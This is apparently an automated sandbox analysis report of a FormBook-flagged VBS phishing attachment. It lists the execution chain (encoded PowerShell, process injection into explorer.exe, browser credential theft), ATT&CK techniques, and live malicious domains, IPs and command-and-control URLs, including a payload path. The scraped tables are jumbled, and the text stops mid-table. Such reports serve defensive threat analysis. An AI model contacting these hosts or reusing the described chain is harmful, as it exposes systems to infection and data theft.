      Virtualization/Sandbox Evasion      		Distributed Component Object Model1
      Credential API Hooking      		Scheduled Transfer15
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Rootkit      		LSA Secrets2
      Process Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Masquerading      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Virtualization/Sandbox Evasion      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job713
      Process Injection      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 688300 Sample: NOA_CMACGM_Notice_of_Arriva... Startdate: 22/08/2022 Architecture: WINDOWS Score: 100 61 www.www55275.com 2->61 63 www.vivino.app 2->63 65 14 other IPs or domains 2->65 83 Snort IDS alert for network traffic 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for URL or domain 2->87 89 7 other signatures 2->89 12 wscript.exe 1 1 2->12         started        signatures3 process4 signatures5 101 Wscript starts Powershell (via cmd or directly) 12->101 103 Very long command line found 12->103 105 Encrypted powershell cmdline option found 12->105 15 powershell.exe 27 12->15         started        process6 signatures7 111 Tries to detect Any.run 15->111 18 ieinstal.exe 6 15->18         started        22 csc.exe 3 15->22         started        25 conhost.exe 15->25         started        process8 dnsIp9 67 proofreading.uz 109.94.209.55, 443, 49780 ARVID-LOGICUMEE Russian Federation 18->67 91 Modifies the context of a thread in another process (thread injection) 18->91 93 Tries to detect Any.run 18->93 95 Maps a DLL or memory area into another process 18->95 99 2 other signatures 18->99 27 explorer.exe 5 3 18->27 injected 55 C:\Users\user\AppData\Local\...\r0st5wfi.dll, PE32 22->55 dropped 31 cvtres.exe 1 22->31         started        file10 97 Performs DNS queries to domains with low reputation 67->97 signatures11 process12 dnsIp13 69 www.ransbottompottery.com 154.201.220.155, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 27->69 71 b12-overdose.site 64.190.62.22, 49794, 49795, 80 NBS11696US United States 27->71 73 7 other IPs or domains 27->73 107 System process connects to network (likely due to code injection or exploit) 27->107 33 wscript.exe 1 18 27->33         started        37 ieinstal.exe 27->37         started        39 ieinstal.exe 27->39         started        41 autoconv.exe 27->41         started        signatures14 process15 file16 51 C:\Users\user\AppData\...\O22logrv.ini, data 33->51 dropped 53 C:\Users\user\AppData\...\O22logri.ini, data 33->53 dropped 75 System process connects to network (likely due to code injection or exploit) 33->75 77 Detected FormBook malware 33->77 79 Wscript starts Powershell (via cmd or directly) 33->79 81 6 other signatures 33->81 43 cmd.exe 2 33->43         started        47 firefox.exe 1 33->47         started        signatures17 process18 file19 57 C:\Users\user\AppData\Local\Temp\DB1, SQLite 43->57 dropped 109 Tries to harvest and steal browser information (history, passwords, etc) 43->109 49 conhost.exe 43->49         started        59 C:\Users\user\AppData\...\O22logrf.ini, data 47->59 dropped signatures20 process21

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs10%VirustotalBrowse
      NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs0%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.vivino.app/oe07/?lP=z6AX5nfHP&0HQL9628=d5su3Z4iOwMZnhaJlYvQjVnFWUJeY1xeLTB2izYPxxrSUwfZ7XCIsMdyeMGBiIZ8vgNU0%Avira URL Cloudsafe
      https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdpG0%Avira URL Cloudsafe
      http://www.ransbottompottery.com/oft0%Avira URL Cloudsafe
      https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdpB0%Avira URL Cloudsafe
      https://contoso.com/License0%Avira URL Cloudsafe
      https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.b12-overdose.site/oe07/0%Avira URL Cloudsafe
      https://powerpoint.office.comEM0%Avira URL Cloudsafe
      https://proofreading.uz/0%Avira URL Cloudsafe
      http://www.b12-overdose.site/oe07/?0HQL9628=5clOU3CSmsejcHs1r+/ykQ4Hy9FDmDDZKmpGOjyBkKFC3bezX8w0IGluu7zAR9IQ1uAi&lP=z6AX5nfHP0%Avira URL Cloudsafe
      https://contoso.com/0%Avira URL Cloudsafe
      http://www.meizhuangs.com/oe07/?lP=z6AX5nfHP&0HQL9628=VBCkGWN3mbdKL69djJN2rdDlRq/RNi1Yl7kVrt0lw4m93269gBnUi9nT/9PpDwJIl7i80%Avira URL Cloudsafe
      http://www.www55275.com/oe07/?lP=z6AX5nfHP&0HQL9628=66zN2ANa36y2SQxhNXKo0SAKr+1fbVR3z5i//1ienxLdBVM2rHrI4b7mKnIyPmnq8yDA0%Avira URL Cloudsafe
      http://www.ransbottompottery.com/ins0%Avira URL Cloudsafe
      http://www.ransbottompottery.com/0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.pngt0%Avira URL Cloudsafe
      www.34652021.xyz/oe07/0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
      http://schemas.microfte0%Avira URL Cloudsafe
      https://word.office.comqu0%Avira URL Cloudsafe
      https://contoso.com/Icon0%Avira URL Cloudsafe
      http://www.www55275.com0%Avira URL Cloudsafe
      http://www.python3.network/oe07/0%Avira URL Cloudsafe
      http://www.priorityfirst.info/oe07/0%Avira URL Cloudsafe
      http://www.avi3p3g.top/oe07/?0HQL9628=RmBYcxyFm1VObidM2bAa3CbHkvDDW3a9A6yXLZmuWUWj0+12Mlvgw6TkPXwNhL4XoXbq&lP=z6AX5nfHP0%Avira URL Cloudsafe
      http://www.erinandroger.com/oe07/0%Avira URL Cloudsafe
      https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdp0%Avira URL Cloudsafe
      http://www.priorityfirst.info/oe07/?0HQL9628=ga39a5RGHObbQca0fqBpykiHYobf5FkgSDcrv7y+pUMgVC128FNTcyIMSfssoxfXuBjY&lP=z6AX5nfHP0%Avira URL Cloudsafe
      http://www.vivino.app/oe07/0%Avira URL Cloudsafe
      http://www.erinandroger.com/oe07/?0HQL9628=sLR7Kynk+A1Dhvlq5c1LtQV19otxtN9oy0czYRBh5HIDSu6LN2YXKPz/VtbWvZwWCPAY&lP=z6AX5nfHP0%Avira URL Cloudsafe
      http://www.avi3p3g.top/oe07/0%Avira URL Cloudsafe
      http://www.ransbottompottery.com/oe07/?0HQL9628=pLC/l6NBeGJNgh7czo/rdhzVs0M3WTYTWFz/T0%Avira URL Cloudsafe
      http://www.meizhuangs.com/oe07/0%Avira URL Cloudsafe
      https://mozilla.org00%Avira URL Cloudsafe
      http://www.www55275.com/oe07/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.www55275.com
      		154.83.27.102
      		truetrue
        		unknown
        b12-overdose.site
        		64.190.62.22
        		truetrue
          		unknown
          www.avi3p3g.top
          		45.117.11.104
          		truetrue
            		unknown
            www.vivino.app
            		45.77.55.161
            		truetrue
              		unknown
              priorityfirst.info
              		34.102.136.180
              		truefalse
                		unknown
                sixie.porkbun.com
                		35.155.7.183
                		truefalse
                  		high
                  proofreading.uz
                  		109.94.209.55
                  		truefalse
                    		unknown
                    www.ransbottompottery.com
                    		154.201.220.155
                    		truetrue
                      		unknown
                      www.meizhuangs.com
                      		166.88.142.63
                      		truetrue
                        		unknown
                        www.erinandroger.com
                        		168.206.212.12
                        		truetrue
                          		unknown
                          www.b12-overdose.site
                          		unknown
                          		unknowntrue
                            		unknown
                            www.priorityfirst.info
                            		unknown
                            		unknowntrue
                              		unknown
                              www.qavsrwkg.top
                              		unknown
                              		unknowntrue
                                		unknown
                                www.lahustlesharder.net
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.semimi.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.python3.network
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.vivino.app/oe07/?lP=z6AX5nfHP&0HQL9628=d5su3Z4iOwMZnhaJlYvQjVnFWUJeY1xeLTB2izYPxxrSUwfZ7XCIsMdyeMGBiIZ8vgNUtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.b12-overdose.site/oe07/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.b12-overdose.site/oe07/?0HQL9628=5clOU3CSmsejcHs1r+/ykQ4Hy9FDmDDZKmpGOjyBkKFC3bezX8w0IGluu7zAR9IQ1uAi&lP=z6AX5nfHPtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.meizhuangs.com/oe07/?lP=z6AX5nfHP&0HQL9628=VBCkGWN3mbdKL69djJN2rdDlRq/RNi1Yl7kVrt0lw4m93269gBnUi9nT/9PpDwJIl7i8true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.www55275.com/oe07/?lP=z6AX5nfHP&0HQL9628=66zN2ANa36y2SQxhNXKo0SAKr+1fbVR3z5i//1ienxLdBVM2rHrI4b7mKnIyPmnq8yDAtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      www.34652021.xyz/oe07/true
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.python3.network/oe07/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.priorityfirst.info/oe07/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.avi3p3g.top/oe07/?0HQL9628=RmBYcxyFm1VObidM2bAa3CbHkvDDW3a9A6yXLZmuWUWj0+12Mlvgw6TkPXwNhL4XoXbq&lP=z6AX5nfHPtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.erinandroger.com/oe07/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.priorityfirst.info/oe07/?0HQL9628=ga39a5RGHObbQca0fqBpykiHYobf5FkgSDcrv7y+pUMgVC128FNTcyIMSfssoxfXuBjY&lP=z6AX5nfHPfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.vivino.app/oe07/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.erinandroger.com/oe07/?0HQL9628=sLR7Kynk+A1Dhvlq5c1LtQV19otxtN9oy0czYRBh5HIDSu6LN2YXKPz/VtbWvZwWCPAY&lP=z6AX5nfHPtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.avi3p3g.top/oe07/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.meizhuangs.com/oe07/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.www55275.com/oe07/true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000008.00000000.25212115803.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25038476018.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24890121708.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25604829654.0000000000D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://windows.msn.com/shellexplorer.exe, 00000008.00000000.25153634469.0000000010950000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25689617230.0000000010950000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdpGieinstal.exe, 00000007.00000003.25330574718.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24877619287.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25341805808.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24876049552.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ransbottompottery.com/oftwscript.exe, 0000000A.00000002.28724077789.0000000000505000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://proofreading.uz/wp-content/themes/seotheme/gFiMGTqLNz187.mdpBieinstal.exe, 00000007.00000003.25330574718.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24877619287.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25341805808.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24876049552.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://img.sedoparking.comwscript.exe, 0000000A.00000002.28750799284.000000000516F000.00000004.10000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEMexplorer.exe, 00000008.00000000.25646860356.0000000009A93000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000008.00000000.25274866476.0000000010E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24988601363.0000000010A1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25156592146.0000000010A1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24994193905.0000000010E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25162707812.0000000010E9C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.microexplorer.exe, 00000008.00000000.25225262464.00000000032C0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25250623263.000000000A7C0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.25110185249.000000000BAA0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://powerpoint.office.comEMexplorer.exe, 00000008.00000000.25259410299.000000000D565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25670831989.000000000D565000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.apache.org/licenses/LICENSE-2.0.htmltpowershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://proofreading.uz/ieinstal.exe, 00000007.00000002.25340415198.0000000002C89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://aka.ms/odirmexplorer.exe, 00000008.00000000.25243023958.00000000098B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24929778214.00000000098B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25636566882.000000000985B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.25049772110.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://wns.windows.com/ocalNexplorer.exe, 00000008.00000000.25634414794.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/powershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://windows.msn.cn/shellRESPexplorer.exe, 00000008.00000000.25153634469.0000000010950000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25689617230.0000000010950000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.25049772110.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://android.notify.windows.com/iOSaexplorer.exe, 00000008.00000000.25697043626.0000000010CA5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.ransbottompottery.com/inswscript.exe, 0000000A.00000002.28724077789.0000000000505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.ransbottompottery.com/wscript.exe, 0000000A.00000002.28724077789.0000000000505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://pesterbdd.com/images/Pester.pngtpowershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.msn.com:443/v1/news/Feed/Windows?-explorer.exe, 00000008.00000000.25662754237.000000000D3C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25256555759.000000000D3C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24955416813.000000000D3C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25119141628.000000000D3C1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://crash-reports.mozilla.com/submit?id=wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://schemas.microfteexplorer.exe, 00000008.00000000.25082733398.000000000985B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25636566882.000000000985B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25242419595.000000000985B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24928124758.000000000985B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://word.office.comquexplorer.exe, 00000008.00000000.24976531952.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25144772721.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25683145292.000000000DA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.25134750533.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.www55275.comwscript.exe, 0000000A.00000002.28746890867.0000000004DF9000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://excel.office.com#6o:explorer.exe, 00000008.00000000.24935249770.00000000099F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25089996662.00000000099F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25245055879.00000000099F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25643384889.00000000099F3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.foreca.comexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://outlook.comexplorer.exe, 00000008.00000000.24976531952.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25144772721.000000000DA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25683145292.000000000DA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.sedo.com/services/parking.php3wscript.exe, 0000000A.00000002.28750799284.000000000516F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/Pester/Pestertpowershell.exe, 00000003.00000002.25060111513.0000000004D4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000000.25697043626.0000000010CA5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://api.msn.com/explorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.ransbottompottery.com/oe07/?0HQL9628=pLC/l6NBeGJNgh7czo/rdhzVs0M3WTYTWFz/Twscript.exe, 0000000A.00000002.28753662700.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://windows.msn.com:443/shellexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://api.msn.com/SLexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.msn.com:443/en-us/feedexplorer.exe, 00000008.00000000.25237871192.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25628903021.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24920368137.000000000551B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25073713017.000000000551B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://mozilla.org0wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            35.155.7.183
